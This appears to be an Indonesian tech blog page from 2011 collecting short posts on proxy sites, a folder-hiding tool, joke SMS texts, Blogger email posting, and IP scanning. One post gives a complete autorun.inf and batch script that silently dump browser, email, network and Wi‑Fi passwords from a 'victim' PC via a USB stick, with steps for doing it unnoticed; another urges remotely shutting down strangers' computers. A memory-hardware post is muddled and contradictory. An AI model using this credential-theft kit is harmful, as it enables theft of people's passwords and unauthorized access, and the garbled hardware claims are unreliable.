Cara membuka situs yang diblokir

Diposkan oleh Riki Handoyo on November 30, 2011

Apakan anda pernah menjumpai saat anda ingin membuka sebuah situs tetapi situs itu tidak bisa dibuka melainkan telah diblokir oleh provider yang anda gunakan???
Namun provider tersebut pasti punya alasan mengapa situs tersebut di blokir biasanya situs tersebut mengandung pornografi yang semakin merajalela didunia maya ini.
Namun anda jangan kwatir kini saya akan memberikan sebuah trik agar situs tersebut bisa kembali anda buka.
1. pakailah browser opera yang terbaru

Dengan browser opera situs-situs yang diblokir tersebut dapat kembali lagi dibuka. GAG percaya monggo dicoba???

2. Gunakan web proxy yang tidak diblokir !
Berikut daftar web proxy yang tidak diblokir :
- http://z-prox.appspot.com/
- http://masokis-proxy.appspot.com/
- http://softslip.appspot.com/
- http://anonymouse.org
- http://proxybrowsing.com
- http://w3privacy.com
- http://ninjacloak.com
- http://the-cloak.com
- http://shadowsurf.com
- http://proxify.com dll

Selamat mencoba ya
Jika ada kesulitan silahkan tinggalkan pesan
"SEMOGA SUKSES"






baca selengkapnnyaCara membuka situs yang diblokir

Folder lock 7.0.3.0

Diposkan oleh Riki Handoyo on November 29, 2011

Agan agan semua pasti punya rahasia dong yang tidak ingin diketahui oleh siapapun, menyimpan rahasia didalam komputer sendiri tidak selalu aman selalu ada saja orang yang jail dan ingin membuka rahasia kita itu,
Jadi kita harus pintar-pintar untuk menyembunyikan file tersebut, dan disini saya bahas tentang folder lock dengan folder lock ini file/folder rahasia kita yang tidak ingin diketahui oleh orang bakalan aman.
Bahkan folder lock ini menyembunyikan file/folder yang kita pilih itu, dan akan dikembalikan jika diunlock lagi.

oke langsung saja downloag disini

petunjuk penginstalan
1. klik 2x file yang sudah anda didownload tadi

2. lalau klik next



3. setelah itu klik igree

4. lalu setelah itu masukan paswors kalian min 6 character dan klik next

5. Dan selanjutnnya klik install lalu tunggu sampai selesai dan klik finis

ok instalasi sudah selesai
sekarang kita tes
  1. klik 2x hasil instalan agan tadi trs
  2. masukan pasword agan saat pengintalan tadi lalu ok
  3. klik add untuk menambahkan file/folder yang ingin diamankan hehe 
  4. setelah itu klik gambar gembok yang ada di pojok kanan on yg berarti folder/fie yang kita pilih tadi akan disembunyikan dan off yang berati akan memunculkan kembali file/folder yank kita pilih tadi 

 jika ada yang kurang jelas silahkan tinggalkan komentar :)








baca selengkapnnyaFolder lock 7.0.3.0

Memory DDR5 5x Lebih Cepat dari Memory

Diposkan oleh Riki Handoyo on November 28, 2011

Kemajuan teknologi kini semakin pesat saja, salah satunnya adalah Memory, kini Memory sudah mencapai DDR5 meski baru beberapa bulan DDR3 Dan selanjutnnya disusul oleh DDR4 namun sekarang DDR5 sudah keluar dengan kecepatan yang lebih besar.
RAM DDR3 memiliki kecepatan maksimal 2133 Mhz  namun kecepatan ini sudah terlampaui oleh RAM DDR4 yang memiliki kecepatan 4226 Mhz wow ini memang kecepatan yang fantastis bahkan  kecepatan ini 2x lipat dari DDR3.
Bill Gervasi, wakil Presiden US Modular membenarkan tentang pengembangan DDR4. Menurut dia, tidak ada yang bakal membayangkan performa DDR4 di masa depan. “Namun, produk anyar ini dibanderol mahal dan tidak praktis bagi pengguna umum,” ujarnya seperti dikutip dari Softpedia, Senin (23/8).
 JEDEC, organisasi pengembang standar piranti mikroelektronik AS, mengharapkan produk contoh dari jenis memori baru ini akan dimulai tahun 2011 untuk pasokan industri. DDR4 bakal hadir dengan kontroler memori yang sesuai dan OS yang berada. Sementara produksi massal sebenarnya dijadwalkan pada tahun 2015.







baca selengkapnnyaMemory DDR5 5x Lebih Cepat dari Memory

flasdisk pencuri password

Diposkan oleh Riki Handoyo on November 27, 2011

tentu saja anda sudah tidak asing lagi dong dengan yang namannya flasdisk tetapi mungkin anda hanya mengunakannnya untuk menyimpan data saja.
Taukan anda jika flasdisk tersebut bisa digunakan sebagai tools hacking yaitu dengan mengunakan flasdisk ini kita bisa mencuri password komputer teman kita, dengan dibantu tools-tools tambahan maka flasdisk kita akan berfungsi secara maksimal.
Baiklah langsung saja dipersiapkan peralatan tempurnnya

yang bisa di download DISINI

Disitu terdapat tools-tools yang akan  membantu misi kita haha
setelah anda download lalu extrac filenya tersebut kedalam flasdisk kita
setelah itu lalu buatlah file notepad didalam flasdisk
dan diisi perintah ini.


[autorun]
open = launch.bat
ACTION = Scan Passwords

 lalu saveas dengan nama "autorun.inf"  jangan lupa untuk memilih "All Files" saat menyimpan file tersebut karena jika tidak anda pilih All Files maka nantinnya extensionnya akan tetap .txt bukan .inf.


Lalu buatlah file notepad kembali dan ketikan  script ini

@echo off


start ChromePass.exe /stext ChromePass.txt

start mailpv.exe /stext mailpv.txt

start mspass.exe /stext netpass.txt

start netpass.exe /stext netpass.txt

start pspv.exe /stext pspv.txt

start WirelessKeyView.exe /stext WirelessKeyView.txt

start ievp.exe /stext.iepv.txt

start routepassview.exe /stext routepassview.txt

kemudian save as dengan nama "launch.bat" dan jangan lupa memilih "ALL file" pada tipe filennya.
dan selesai sudah peralatan tempur kita tinggal kita uji "SEMOGA BERHASIL"

Eh hampir lupa nulis cara ngunainnya ^_^
Ngegunainnya gini nie, berdoa dulu biar tenang dan berhasil :)



1. Colokin flasdisk ke Computer korban bahasa kerennya Computer target / victim ziahahhaha:D
2. kan autorun tuh langsung kebuka pop up kita pilih yg paling atas gan scan password
3. nah semua tool udah bekerja dan mengirimkan datanya ke file .txt
4. buruan jangan lama2 keburu dateng yg punya computernya wkwkkw
5. Udah beres :) pulang deh bawa flashdisknya















Jika ada masalah silahkan tinggalkan komentar ^_^





baca selengkapnnyaflasdisk pencuri password

Kumpulan Sms Lucu - Terbaru I

Diposkan oleh Riki Handoyo

Kumpulan sms lucu terbaru memang selalu menjadi hobi para sms'ser Indonesia. Nah, kali ini kumpulan terbaru mau berbagi nih kata-kata sms lucu yang saya dapat dari blog dhewy[dot]com. Mungkin ini bisa untuk kamu-kamu bercanda ria dengan teman-teman. Sms lucu ini memang lagi rame-ramenya direbutin ama blogger-blogger Indonesia, termasuk ane (hihhihihiihi). Tanpa banyak ini itu yang gak jelas, mending nih langsung tak beri aja sms-sms lucu untuk kamu share ke pacar, teman, rekan kantor, sahabat, dan orang istimewamu.

sms lucu terbaru
sms lucu terbaru

Kumpulan sms lucu terbaru cekidot :

==============================
Eh loe tau gak macam-macam jenis ES, kalo gak tau, ni aku kasih tau ya,

1. AirJatuh = netES
2. AirLiur = ngecES
3. Airdingin = ES
4. Pepaya = katES
5. Ikan bakar = pepES
5. Pesan singkat = smES
7. Orang yg baca = strES
8. Setuju?? = yES ^_^
==============================

=============================
Ciee,,cieee,, dah siap berangkat ni yee..
Kamu emang tampil beda deh hari ini bro,
Mandi sudah,,
Sholat udah juga,,
Tampang apa lagi,, beeuuhhhh,, oke banget,,
Kostum juga udah pas banget ama badan, putih bersih lagi,,
Pokok'nya mateb abiz deh kamu hari ini,,

So,,

Mau berangkat dikubur jam berapa cuy,,??? ^_^
==============================

==============================
Kamu tau gak, waktu diliat tu bikin deg-degan buangetss,
Apalagi pas dipegang, tambah tegang tau gak,
Kagak nahan pas dipegang trus dikocok, hmmm.
Akhirnya keluar dengan selamat,

Ahh,,,euaahhhh,,ah puas rasanya,
Akhirnya gwe dapet arisan neh.
==============================

==============================
Imam sudah datang
Makmum sudah banyak
Kain kafan udah dibeli juga
Kranda juga sudah siap,
Kuburan sudah digali
Tapi mayatnya dimana nihh..???

ee,,Ya ampun,, malah enak-enakan baca sms,,
hayo sini cepetan, dah pada nungguin nie.. ^_^
==============================

==============================
Eh, kamu tau gak, ternyata ada fenomena didunia ini yang belom kamu ketahui

Fenomena 1 : Loe gak bisa nyentuh semua gigi dengan lidah loe.
Fenomena 2 : Setelah baca fenomena 1 dengan begonya loe mempraktekkannya.
Fenomena 3 : Setelah baca fenomena 2 loe tersenyum dengan jengkelnya.
Fenomena 4 : Loe pasti bakal ngirim ni sms ke seluruh temen loe ato menghapusnya.
==============================

==============================
Akulah pahlawan kecil
Yang gagah berani
Bila belanda datang
Aku serang
Bila belanda balas
Aku bilang "Idiihh,, beraninya ama anak kecil".
==============================

==============================
Suara ayam : kukuruyukkk..!!!
Suara kucing : meong..
Suara kambing : embekk..
Suara Monyet : .....?

kok diemm nyet,, kenapa, lagi sariawan ya ? ha..ha..ha..^_^
==============================

==============================
Semangatmu seperti BUNG TOMO
Otakmu sepandai BUNG KARNO
Jasa mu sebesar BUNG HATTA
Tapi wajahmu seperti BUNGkusan nasi. ^_^
==============================

==============================
Sekelompok ibliz datang menghampiriku,
Mereka menginginkan orang beriman,
Lalu kutawarkan namamu karena ku tau kamu beriman,
Tapi ibliz itu malah berteriak,,,

Jaaanngannnn,...!!!
Dia BOS kamii,,!!!
==============================

==============================
Ku terpanah saat menatap matamu
Nafasku terhenti sejenak
Denyut jantungku berdebar kencang
Apakah ini yg kurasakan
kau,,kau,,kau
KENTUT Yaa,,,,
wkkwkwkwkwkw.
==============================

==============================
Kamu janji gk akan ninggalin aku,
Tapi kenapa sekarang kamu ninggalin aku?
Apa aku salah punya tampang seganteng ini?
Tolong Replay jika aku benar-benar ganteng.
Tapi kalo kamu gak replay tandanya kamu cinta ma aku. ^_^
==============================

==============================
Selamat, anda mendapatkan MENTARI gratis,
Silahkan pergi kelapangan untuk menikmati mentari gratis.
==============================

Kumpulan sms lucu terbaru mungkin itu dulu saja yah. Tapi tenang, kapan-kapan aku kasih lagi deh yang mantab-mantab. Jangan lupa langsung sms ke temen-temenmu ya. Buruan kirimin sms tu keteman-temanmu, kirim semua sms lucu terbaru.
baca selengkapnnyaKumpulan Sms Lucu - Terbaru I

cara posting lewat email

Diposkan oleh Riki Handoyo on November 26, 2011

sebenarnnya cara ini sudah lama tetapi saya baru menemukannya ^_^
Dan cara ini memberikan kemudahan bagi kita para blogger yang lg berada didalam perjalanan atau sedang berpergian dan ingin posting tetapi tidak sempat membuka blogger.com maka soolusinnya adalah anda cukup mengirim sebuah email dari hp dan otomatis akan terposting di blog anda.
Ok deh langsung saja ke TKP

1. masuk ke blogger.com
2. pilih blog yang akan anda setting agar dapat posting lewat email
3. masuk ke setting
4. lalu pilih mobile n email
5. Pada Posting Using Emailmasukkan kata atau nama yang kita kehendaki sebagai kata kunci (jangan pernah memberi tahukan kepada orang lain), alamat ini adalah alamat yang kita tuju ketika akan mengirim email untuk posting. kalo orang lain sampai tau maka mereka akan sembarang mengirim ke alamat tersebut dan akan terpoting diblog kita.
6.  Pilih / klik  Publish email immediately 
7.  Klik Save Setting







baca selengkapnnyacara posting lewat email

cara menyscan ip komputer lain

Diposkan oleh Riki Handoyo on November 25, 2011

Bagia anda yang suka iseng dalam jaringan pasti akan berusaha memcari tau ip seseorang yang lagi terkoneksi internet. sebenarnnya banyak cara untuk mengetahui ip seseorang yaitu salah satunya mengunakan software yang dikenal dengan IP SCAN. sesuai namannya ip scan ini berfungsi untuk menyecan ip-ip komputer yang segang terkoneksi kedalam jaringan internet.
Dan ip scan juga dapat berfungsi untuk ngeremote komputer yang lagi terkoneksi ke internet. dan dengan ip scan ini juga kita dapat mengerjai kompuer yang lagi terkoneksi, kita dapat menshutdown/ me restart komputer tersebut dengan ip scan ini dan tidak hanya itu saja masih banyak lagi fitur yang terdapat si ip scan.
Dan pengunaanya pun cukup mudah tinggal koneksikan komputer/laptop anda lalu bukalah ip scan yang tentunnya sudah anda install sebelumnya lalu tinggal klik scan maka sofware tersebut akan menyecan komputer-komputer yang lagi terkoneksi ke internet.
Setelah ip dan nama komputer tersebut sudah kelihatan setelah itu tinggal terserah anda mau diapakan komputer itu.
kalo anda tidak pengen iseng dengan komputer itu maka anda juga bisa chat dengan komputer itu dengan mengunakan software ini




Softwarenya bisa anda download DISINI




baca selengkapnnyacara menyscan ip komputer lain